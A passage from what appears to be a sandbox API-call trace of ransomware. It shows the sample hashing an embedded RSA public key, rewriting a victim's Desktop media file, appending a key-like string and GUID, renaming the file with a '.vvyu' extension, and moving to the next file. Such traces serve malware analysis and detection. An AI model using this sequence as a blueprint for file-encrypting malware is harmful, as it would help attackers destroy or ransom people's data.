nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x938a, lpOverlapped=0x0) returned 1 [0192.533] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.534] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.535] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.535] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.535] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.535] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.535] GetLastError () returned 0x0 [0192.535] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.535] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.535] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.535] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.535] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9390) returned 0x2ea79b0 [0192.536] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e952a8 [0192.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e952f0 [0192.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.537] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9ea68 [0192.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93630 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93618 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.540] GetCurrentThreadId () returned 0x66c [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e530 [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.540] GetCurrentThreadId () returned 0x66c [0192.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93630 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93690 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936a8 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93648 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93618 [0192.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9ea68 [0192.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9ec78 [0192.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0192.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ee90 [0192.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ec78 | out: hHeap=0x620000) returned 1 [0192.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee90 | out: hHeap=0x620000) returned 1 [0192.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e952f0 | out: hHeap=0x620000) returned 1 [0192.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.555] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x9385, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x9385, lpOverlapped=0x0) returned 1 [0192.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.556] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x938a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.556] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.557] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.558] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.558] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.558] CloseHandle (hObject=0x568) returned 1 [0192.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0192.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e9ea68 [0192.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.560] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\jqzylB.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\jqzylb.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\jqzylB.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\jqzylb.m4a.vvyu")) returned 1 [0192.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.567] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.570] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe70751c0, ftCreationTime.dwHighDateTime=0x1d89828, ftLastAccessTime.dwLowDateTime=0x63fc4540, ftLastAccessTime.dwHighDateTime=0x1d8a702, ftLastWriteTime.dwLowDateTime=0x63fc4540, ftLastWriteTime.dwHighDateTime=0x1d8a702, nFileSizeHigh=0x0, nFileSizeLow=0x31a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K3t8MlfEa.mp3", cAlternateFileName="K3T8ML~1.MP3")) returned 1 [0192.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e952f0 [0192.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e952f0 | out: hHeap=0x620000) returned 1 [0192.570] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\K3t8MlfEa.mp3") returned=".mp3" [0192.570] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\K3t8MlfEa.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\k3t8mlfea.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 